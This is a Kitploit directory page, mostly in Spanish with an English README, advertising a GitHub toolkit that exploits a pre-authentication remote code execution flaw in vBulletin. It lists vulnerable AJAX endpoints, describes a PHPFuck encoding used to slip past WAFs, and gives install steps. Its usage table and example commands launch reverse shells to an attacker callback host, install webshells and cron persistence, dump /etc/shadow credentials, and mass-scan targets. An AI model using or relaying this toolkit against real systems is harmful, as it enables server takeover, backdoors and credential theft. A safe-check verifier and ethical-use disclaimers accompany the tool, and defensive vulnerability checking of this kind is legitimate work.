Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin Pre-Auth RCE (CVSS 9.8). Vuln 5.x/6.x (unpatched). Multi-exploit via Endpoint Pool, AJAX, PHPFuck WAF bypass. Full toolkit: reverse shell, proxy, persistence, webshell, database operations, firewall control, log management, mass scanning. 2 versions: multi-exploit & safe-check. Python 3.8+ Use Ethically, Stay Legal. 🔒 | Kitploit
Herramientas/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
Network MappingVulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationWAF BypassPenetration TestingRemote Access ToolPayload Development

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Database Security
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

Ver Repositorio
4hace 14 díasAún no revisado

Acerca de

CVE-2026-61511 – vBulletin Pre-Auth RCE (CVSS 9.8). Vuln 5.x/6.x (unpatched). Multi-exploit via Endpoint Pool, AJAX, PHPFuck WAF bypass. Full toolkit: reverse shell, proxy, persistence, webshell, database operations, firewall control, log management, mass scanning. 2 versions: multi-exploit & safe-check. Python 3.8+ Use Ethically, Stay Legal. 🔒

Compartir
Contenido no disponible en el idioma solicitado. Mostrando versión en inglés.

CVEPoC

CVE-2026-61511 – vBulletin Pre‑Auth RCE Exploit & Verifier

Python 3.8+ CVSS Author vBulletin

⚠️ ETHICAL USE ONLY – AUTHORIZED SECURITY TESTING
This repository provides tools for authorized security professionals, blue teams, and penetration testers only.
Unauthorized access to computer systems is illegal under CFAA (US), Computer Misuse Act (UK), TCK 243/244 (Turkey), and similar laws worldwide.


📖 Vulnerability Overview

CVE‑2026‑61511 is a PHP eval() injection flaw in vBulletin's AJAX template rendering engine.
Affected versions: 5.0.0 – 5.7.5 and 6.0.0 – 6.2.1.

How it works

  1. Multiple attack endpoints – the bug exists in several AJAX handlers:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • Various /ajax/api/content_* /getIndexableContent endpoints
  2. PHPFuck encoding – the payload is transformed into a sequence of PHP operators and numbers that bypasses WAF filters and allows arbitrary PHP code execution.

  3. No authentication required – an attacker can send a crafted POST request to any vulnerable endpoint and execute system commands with the privileges of the web server.

  4. Impact – full server compromise, data theft, backdoors, lateral movement, and persistence. Upgrade the version!

Patch

  • vBulletin 6.2.2 and Patch Level 1 for older versions fix this issue.
  • Always upgrade to the latest version.

🧰 Tools

ToolPurposeIntended User
exploit.pyFull toolkit with reverse shell, persistence, file operations, database dump, firewall management, log management, port forwarding, SSH key deployment, network scanning, and mass scanning (multi‑threaded).

📊 Feature Comparison


🎯 Use Case Summary


⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

requirements.txt content:

root@kitploit:~
request
urllib3

Parameters 🌬️

Scenarios

Endpoint Pool 🅿️

🛡️ Responsible Use

  • Only use these tools on systems you own or have explicit written permission to test.
  • Unauthorized access is illegal and unethical.
  • The authors are not responsible for any misuse.
  • Always follow your country's laws and regulations.

This software is provided for educational purposes and authorized security testing only.

Descargar herramienta
Red teams / authorized pentesters
safecheck.pyNon‑intrusive verifier that checks vulnerability without executing any malicious payload. Detects version, tests all endpoints, and generates a detailed report.Blue teams / security auditors
Featureexploit.pysafecheck.py
Vulnerability detection✅✅
Version detection✅✅
Multi‑endpoint testing (18 paths)✅✅
Command execution✅❌
Reverse shell✅❌
File upload/download✅❌
Persistence mechanisms✅❌
Web shell deployment✅❌
Database operations✅❌
System information gathering✅✅
Firewall management✅❌
Log management✅❌
Port forwarding✅❌
SSH key deployment✅❌
Network scanning✅❌
Mass scanning (multi‑thread)✅❌
Proxy support✅✅
JSON report output✅✅
Interactive menu✅❌
Non‑intrusive (safe) mode❌✅
Verbose/Debug mode✅✅
Custom command execution✅❌
Multi‑command chaining✅❌
Remote file reading✅❌
Remote file writing✅❌
System user management✅❌
Firewall bypass techniques✅❌
WAF evasion (PHPFuck)✅✅
ScenarioRecommended Tool
Blue Team – verifying if your vBulletin installation is vulnerablesafecheck.py
Security Audit – non‑intrusive vulnerability assessmentsafecheck.py
Red Team – authorized penetration testing with full exploitationexploit.py
Bug Bounty – responsible disclosure testingsafecheck.py
Mass Scanning – checking multiple targets for vulnerabilityexploit.py (detection only)
Incident Response – checking if systems are compromisedsafecheck.py
ParameterDescription
-t, --targetTarget URL (e.g. http://forum.com/vb)
--proxyHTTP proxy (e.g. http://127.0.0.1:8080)
--timeoutRequest timeout in seconds (default: 10)
--retryRetry count per path (default: 3)
--outputSave detailed report to JSON file
-v, --verboseVerbose output
-q, --quietQuiet mode (minimal output)
--lhostRequired for exploit – IP for callback
--lportPort for callback (default: 4444)
--threadsThreads for mass scanning (default: 5)
--exploitPerform exploitation after detection
--fullFull attack (all modules)
--shellStart reverse shell
--webshellInstall webshell (/shell.php)
--persistInstall persistence (cron job)
--dumpDump database
--dump-credsDump credentials (/etc/passwd, /etc/shadow)
--interactiveInteractive menu after successful verification
#ScenarioCommand
1Quick vulnerability checkpython safecheck.py -t http://target.com/vb
2Detailed scan with reportpython safecheck.py -t http://target.com/vb --output report.json -v
3Reverse shellpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4Full attack (all modules)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5Mass scanning from filepython exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6Interactive menu modepython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#Endpoint
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent